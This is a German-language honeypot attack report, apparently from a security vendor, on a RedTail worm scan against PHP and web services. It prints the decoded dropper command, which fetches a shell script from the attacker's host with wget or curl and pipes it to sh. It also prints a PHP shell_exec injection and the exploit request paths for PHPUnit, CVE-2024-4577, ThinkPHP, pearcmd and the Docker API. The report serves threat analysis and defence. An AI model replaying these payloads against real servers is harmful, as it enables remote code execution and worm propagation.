ALLSmartSecurity
Angriffsfall

libredtail-Wurm: drei PHP-RCE-Luecken in 15 Sekunden

04.08.2026 · self-replicating worm · RedTail · 45 Anfragen · Dauer 15 s · Vereinigte Staaten

Überblick

Klassifizierung
self-replicating worm
Malware-Familie
RedTail (laut abuse.ch)
Angriffsmuster
Shell-/RCE-Probe, PHP-Scan, Command-Injection, Config-/Secret-Leak
Herkunft
Vereinigte Staaten · HostPapa
Werkzeug (User-Agent)
libredtail-http

45 Anfragen in 15 s von [IP], User-Agent libredtail-http. Signaturen: CVE-2017-9841, CGI/Shellshock, Docker-API, PHP-shell_exec, Malware-Dropper.

Erkannte Signaturen

Nachgeladener Schadcode (entschärft)

Dekodierte Payloads

(wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s cve_2024_4577.selfrep

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
root@srv01: ~
root@srv01:~$ POST /cgi-bin/../../../../../../../../../../bin/sh
(wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s apache.selfrep
root@srv01:~$ POST /hello.world
<?php shell_exec(base64_decode("[Token]")); echo(md5("Hello CVE-2024-4577")); ?>
root@srv01:~$ POST /
<?php shell_exec(base64_decode("[Token]")); echo(md5("Hello CVE-2024-4577")); ?>
root@srv01:~$ GET [Token].php?<?php echo(md5("Hello PHPUnit"));
root@srv01:~$ GET /vendor/phpunit/src/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit"));
root@srv01:~$ GET /vendor/phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit"));
root@srv01:~$ GET /phpunit/phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit"));
root@srv01:~$ GET /phpunit/src/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit"));
root@srv01:~$ GET /phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit"));
root@srv01:~$ GET /lib/phpunit/src/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit"));
root@srv01:~$ GET /lib/phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit"));
root@srv01:~$ GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
root@srv01:~$ GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello
root@srv01:~$ GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.php
root@srv01:~$ GET /index.php?lang=../../../../../../../../tmp/index1
root@srv01:~$ GET /containers/json

Ablauf

(16 von 45, Wiederholungen zusammengefasst)
ZeitMethodePfad / PayloadMuster
+0 sPOST/cgi-bin/../../../../../../../../../../bin/sh
(wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s apache.selfrep
Command-Injection
+0 sPOST/hello.world
<?php shell_exec(base64_decode("[Token]")); echo(md5("Hello CVE-2024-4577")); ?>
+1 sPOST/
<?php shell_exec(base64_decode("[Token]")); echo(md5("Hello CVE-2024-4577")); ?>
+1 sGET[Token].php?<?php echo(md5("Hello PHPUnit"));Shell-/RCE-Probe
+2 sGET/vendor/phpunit/src/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit"));Shell-/RCE-Probe
+3 sGET/vendor/phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit"));Shell-/RCE-Probe
+4 sGET/phpunit/phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit"));Shell-/RCE-Probe
+5 sGET/phpunit/src/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit"));Shell-/RCE-Probe
+5 sGET/phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit"));Shell-/RCE-Probe
+6 sGET/lib/phpunit/src/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit"));Shell-/RCE-Probe
+6 sGET/lib/phpunit/Util/PHP/eval-stdin.php?<?php echo(md5("Hello PHPUnit"));Shell-/RCE-Probe
+13 sGET/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloPHP-Scan
+13 sGET/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloPHP-Scan
+14 sGET/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5("hi"));?>+/tmp/index1.phpPHP-Scan
+14 sGET/index.php?lang=../../../../../../../../tmp/index1PHP-Scan
+15 sGET/containers/json